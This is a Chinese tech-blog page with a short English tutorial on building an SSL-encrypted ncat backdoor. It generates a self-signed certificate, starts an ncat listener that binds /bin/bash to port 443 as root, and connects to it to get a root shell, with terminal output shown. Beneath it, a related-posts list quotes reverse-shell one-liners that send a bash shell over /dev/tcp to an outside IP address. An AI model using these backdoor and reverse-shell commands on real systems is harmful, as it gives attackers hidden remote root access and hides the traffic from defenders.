Linux - ncat ssl backdoor

最新推荐文章于 2024-06-24 16:29:59 发布
最新推荐文章于 2024-06-24 16:29:59 发布
阅读量1.3k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: Linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/nixawk/article/details/52007966
本文介绍如何使用 NCAT 工具通过 SSL 建立监听及连接,包括生成自签名证书和私钥的过程。适用于安全测试场景,提供了一种简单的方法来建立加密的网络通信。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Generate a keypair

Using an existing certificate and key is recommended whenever possible because it allows for robust server authentication. Use the –ssl-cert and –ssl-key options to pass in PEM-encoded files. For testing purposes you can generate a self-signed certificate and private key. If you have OpenSSL installed, use this command:

openssl req -new -x509 -keyout test-key.pem -out test-cert.pem

Listen a backdoor

root@kali:/tmp# ncat -vn --ssl --ssl-cert test-cert.pem --ssl-key test-key.pem -l -p 443 -e /bin/bash
Ncat: Version 7.01 ( https://nmap.org/ncat )
Enter PEM pass phrase:
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443

Connect to a backdoor

root@kali:/tmp# ncat -vn --ssl 127.0.0.1 443
Ncat: Version 7.01 ( https://nmap.org/ncat )
Enter PEM pass phrase:
Ncat: Subject: C=AU, ST=Some-State, O=Internet Widgits Pty Ltd
Ncat: Issuer: C=AU, ST=Some-State, O=Internet Widgits Pty Ltd
Ncat: SHA-1 fingerprint: B134 C432 299D 9E68 E8E7 4517 FD26 0917 E22A A4A7
Ncat: Certificate verification failed (self signed certificate).
Ncat: SSL connection to 127.0.0.1:443. Internet Widgits Pty Ltd
Ncat: SHA-1 fingerprint: B134 C432 299D 9E68 E8E7 4517 FD26 0917 E22A A4A7
id
uid=0(root) gid=0(root) groups=0(root)

References

https://nmap.org/ncat/guide/ncat-ssl.html

[ Linux ] netcat 使用 && ncat ssl加密传输
qq_40636259的博客
07-14 3796
0x00 简介 NetCat,简称 NC ,是一款非常强大却又很小巧的网络工具,素有 " 瑞士军刀 " 的美称。尽管距离它的发布已经有了一些年头了,但即使在今天9102年, 它的使用仍然非常的广泛,配合管道符使用也往往有奇效,十分值得我们学习。 NC 所做的,其实就是在终端之间建立连接,并传递数据流,在接下来的操作中,就比较考验想象力了。 usage: nc [-hlnruz][-g<网...
Netcat 的加密通信
Kali与编程
02-17 1230
通过使用OpenSSL进行加密通信和使用SSH隧道进行加密通信,我们可以在不安全的网络中进行安全通信。其中,server_ip是服务器的IP地址,server_port是服务器的端口号,cert.pem是客户端的证书文件,key.pem是客户端的私钥文件,ca-cert.pem是SSL证书的根证书文件。其中,listen_port是本地端口号,target_ip和target_port是目标IP地址和端口号,user是SSH服务器的用户名,ssh_server_ip是SSH服务器的IP地址。
ncat
qq726232111的博客
04-19 2634
官方介绍: https://nmap.org/ncat/ 使用手册: https://nmap.org/ncat/guide/index.html 概述 1 介绍 1.1 选项 1.2 exec模式的环境变量 2 使用手册 2.1 用途 2.2 基本用法 2.3 协议 2.4 连接代理 2.5 SSL 2.6 命令执行 2.7 输出选项 2.8 访问控制 2.9 代理 2.10 其它选项 2.11 文件传输 2.12 聊天 2.13 Neat Tricks(...
一文让你熟练掌握Linuxncat(nc)命令
weixin_33850015的博客
09-27 276
一文让你熟练掌握Linuxncat(nc)命令 ncat 或者说 nc 是一款功能类似 cat 的工具,但是是用于网络的。它是一款拥有多种功能的 CLI 工具,可以用来在网络上读、写以及重定向数据。 它被设计成可以被脚本或其他程序调用的可靠的后端工具。同时由于它能创建任意所需的连接,因此也是一个很好的网络调试工具。 ncat/nc 既是一个端口扫描工具,也是一款安全工具,还是一款监测工具,甚至可...
NcatPortable:针对openssl-1.0.1d的Ncat 5.59BETA1的Win32便携式版本
05-21
Ncat便携式 针对openssl-1.0.1d的Ncat 5.59BETA1的Win32便携式版本 只需按照此处的说明进行构建-https: 这里检查Nmap的许可证-
Ncat 网络工具
最新发布
蒋含竹的博客
06-24 5663
文章详细介绍了 Ncat 的基本功能、安装方法、工作模式以及具体使用示例。主要内容包括: 简介:提供了官网和文档链接。描述了 Ncat 作为一个命令行工具,可以读写网络数据,是对 Netcat 的增强版,集成在 Nmap 工具中。安装方法是通过安装 Nmap。 基础说明:介绍了 Ncat 的两种工作模式:连接模式(connect mode)和监听模式(listen mode)。说明了默认的协议(TCP)和如何指定其他协议(UDP、SCTP)。解释了 IPv4 和 IPv6 的默认行为及强制使用某一协议的命令
nmap-ncat-6.40-19.el7.x86_64.rpm
01-15
官方离线安装包,测试可用。使用rpm -ivh [rpm完整包名] 进行安装
nmap-ncat-7.70-6.el8.aarch64.rpm
01-15
官方离线安装包,测试可用。使用rpm -ivh [rpm完整包名] 进行安装
nmap-ncat-7.70-6.el8.x86_64.rpm
01-15
官方离线安装包,测试可用。使用rpm -ivh [rpm完整包名] 进行安装
nmap-ncat-7.70-5.el8.aarch64.rpm
01-15
官方离线安装包,测试可用。使用rpm -ivh [rpm完整包名] 进行安装
window平台 ncat工具
03-26
windows平台下ncat工具,Netcat用于从TCP/UDP连接中读取或发送网络数据。(使用方法:ncat.exe -l -k -p 6666)
Kali linuxncat 使用详解
isinstance的博客
01-07 1万+
NCAT 的意思就是 连接和重定向套接字(Concatenate and redirect sockets) 使用方法呢也是ncat [OPTIONS...] [hostname] [port] 描述 ncat是一个功能强大的网络工具,能从网络之中通过命令行读取和写入数据. ncat是为nmap项目编写的,是从nmap项目中分离出来的最好的部分 它设计是一个可靠的后端工具,以提供即时网络
各种反弹shell方式
m0_58606546的博客
11-17 2394
1、Bash环境下反弹TCP协议shell 首先在本地监听TCP协议443端口 nc -lvp 443 然后在靶机上执行如下命令: 1 bash -i >& /dev/tcp/121.40.248.82/1234 0>&1 1 /bin/bash -i > /dev/tcp/121.40.248.82/1234 0<& 2>&1 1 exec 5<>/dev/tcp/10.10.10.11/443;ca.
Flink DataStream常用算子
鸣宇淳的专栏
02-14 2万+
Flink中的算子是将一个或多个DataStream转换为新的DataStream,可以将多个转换组合成复杂的数据流拓扑。 在Flink中,有多种不同的DataStream类型,他们之间是使用各种算子进行的。如下图所示: 以下列举下常用的算子,用到的代码例子都是Flink监听9000端口做为数据源。以下方法可以启动一个9000的socket端口服务。 Linux平台上可以使用 bash nc -...
Tomcat 配置 HTTPS 协议( 以https://开头访问自己的项目 )
weixin_43841234的博客
08-15 578
Tomcat 配置 HTTPS 协议 HTTPS 协议验证过程 HTTPS验证过程是分为单向验证和双向验证 单向认证 客户端保存着服务端的证书并信任该证书即可(参照百度,咱们是没有证书的,百度的证书是由权威CA机构颁布的) https一般是单向认证,这样可以让绝大部分人都可以访问你的站点。(依旧参照百度,这里咱们只需要验证百度的服务器证书即可,这里是浏览器去验证的) 双向验证 先决条件是有两个或两个以上的证书,一个是服务端证书,另一个或多个是客户端证书。 服务端保存着客户端的证书并信任该证书
Wireshark进阶之网络问题案例分析
Mi1k7ea
10-24 9445
本文假定的基础是阅读者会使用Wireshark了,这里就对一些应用的场景以及一些不正常的网络环境来进行分析的案例~ 这里先列一下筛选器的语法: 过滤语法: 限定词 例子 Type host、net、port Dir src、dst Protocol ether、ip、tcp、udp、http、ftp 逻辑运算符:&&
入门教程 | 5分钟从零构建第一个 Flink 应用
weixin_34111790的博客
05-22 274
本文转载自 Jark’s Blog ,作者伍翀(云邪),Apache Flink Committer,阿里巴巴高级开发工程师。 本文将从开发环境准备、创建 Maven 项目,编写 Flink 程序、运行程序等方面讲述如何迅速搭建第一个 Flink 应用。 在本文中,我们将从零开始,教您如何构建第一个 Flink 应用程序。 开发环境准备 Flink 可以运行在 Linux, Max OS X,...
windows环境下nc(netcat)的安装及使用
热门推荐
浅沫
03-29 10万+
一、下载 url:https://eternallybored.org/misc/netcat/ 我下载下来360会拦截,说是有木马,我没有理会,下载考出nc.exe后将文件就删了 打开下载的压缩包,找到nc.exe,复制粘贴到 c盘 users/当前登录用户目录下即可(简单粗暴的方式,也可以自己配置环境变量) 二、测试 打开命令界面 cmd 输入nc命令即可 我是在...
Linux下的NCAT端口监测与扫描技巧
Ncat也能够处理多种数据传输编码,并且可以使用SSL进行加密通信。 ### 使用Ncat进行端口监测 在给定的描述中,我们看到了以下命令序列: ```shell tar -zxvf ncat.tar.gz cd ncat rpm -ivh *.rpm ncat -4 -l -p ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值